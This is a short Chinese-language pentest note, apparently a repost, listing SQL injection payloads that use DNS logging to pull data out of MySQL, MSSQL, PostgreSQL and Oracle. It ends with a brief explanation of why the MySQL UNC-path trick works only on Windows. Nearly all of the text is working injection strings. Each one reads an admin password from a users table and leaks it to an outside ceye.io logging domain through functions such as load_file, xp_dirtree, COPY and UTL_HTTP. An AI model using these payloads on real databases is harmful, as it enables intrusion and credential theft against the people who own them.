Dnslog在SQL注入 & 四种数据库

https://www.anquanke.com/post/id/98096

 

mysql

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) 
FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))

mssql

http://127.0.0.1/mssql.php?id=1;
DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) 
FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');

postgres

http://127.0.0.1/pgSQL.php?id=1;DROP TABLE IF EXISTS table_output;

CREATE TABLE table_output(content text);

CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;

DECLARE query_result TEXT;

BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);

exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';

   EXECUTE exec_cmd;

END;

$$ LANGUAGE plpgSQL SECURITY DEFINER;

SELECT temp_function();

oracle // 仅列举了四种函数

1. [UTL_HTTP.REQUEST] select name from test_user where id =1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;

2. [DBMS_LDAP.INIT] select name from test_user where id =1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;

3. [HTTPURITYPE] select name from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;

4. [UTL_INADDR.GET_HOST_ADDRESS] select name from test_user where id =1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL; 

 

UNC 对于 DNSLOG 必看,城哥问过我

    load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。
    UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
    因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的 

 

 

你可能感兴趣的:(渗透)